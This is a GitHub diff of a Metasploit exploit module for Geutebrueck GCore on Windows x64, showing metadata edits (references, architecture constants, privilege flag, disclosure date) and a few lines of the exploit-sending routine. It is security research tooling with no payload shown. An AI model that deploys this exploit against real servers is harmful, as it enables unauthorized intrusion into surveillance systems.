3
3
# Current source: https://github.com/rapid7/metasploit-framework
4
4
##
5
5
6
- require 'msf/core'
7
6
require 'nokogiri'
8
7
require 'open-uri'
9
8
@@ -24,21 +23,22 @@ def initialize(info = {})
24
23
] ,
25
24
'References' =>
26
25
[
27
- [ 'www.geutebrueck.com' , '' ]
26
+ [ 'EDB' , '41153' ] ,
27
+ [ 'URL' , 'www.geutebrueck.com' ]
28
28
] ,
29
29
'Platform' => 'win' ,
30
30
'Targets' =>
31
31
[
32
- [ 'Automatic Targeting' , { 'auto' => true , 'Arch' => ARCH_X86_64 } ] ,
33
- [ 'GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)' , { 'Arch' => ARCH_X86_64 } ] ,
34
- [ 'GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)' , { 'Arch' => ARCH_X86_64 } ]
32
+ [ 'Automatic Targeting' , { 'auto' => true , 'Arch' => ARCH_X64 } ] ,
33
+ [ 'GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)' , { 'Arch' => ARCH_X64 } ] ,
34
+ [ 'GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)' , { 'Arch' => ARCH_X64 } ]
35
35
] ,
36
36
'Payload' =>
37
37
{
38
38
'Space' => '2000'
39
39
} ,
40
- 'Privileged' => false ,
41
- 'DisclosureDate' => '2017-01-24 ' ,
40
+ 'Privileged' => true ,
41
+ 'DisclosureDate' => 'Jan 24 2017 ' ,
42
42
'DefaultTarget' => 0 ) )
43
43
end
44
44
@@ -272,7 +272,6 @@ def exploit
272
272
print_status ( 'Exploit ready for sending...' )
273
273
sock . put ( exploit , 'Timeout' => 20 )
274
274
print_status ( 'Exploit sent!' )
275
- # sleep(10)
276
275
buf = sock . get_once || ''
277
276
rescue Rex ::AddressInUse , ::Errno ::ETIMEDOUT , Rex ::HostUnreachable , Rex ::ConnectionTimeout , Rex ::ConnectionRefused , ::Timeout ::Error , ::EOFError => e
278
277
elog ( "#{ e . class } #{ e . message } \n #{ e . backtrace * "\n " } " )
0 commit comments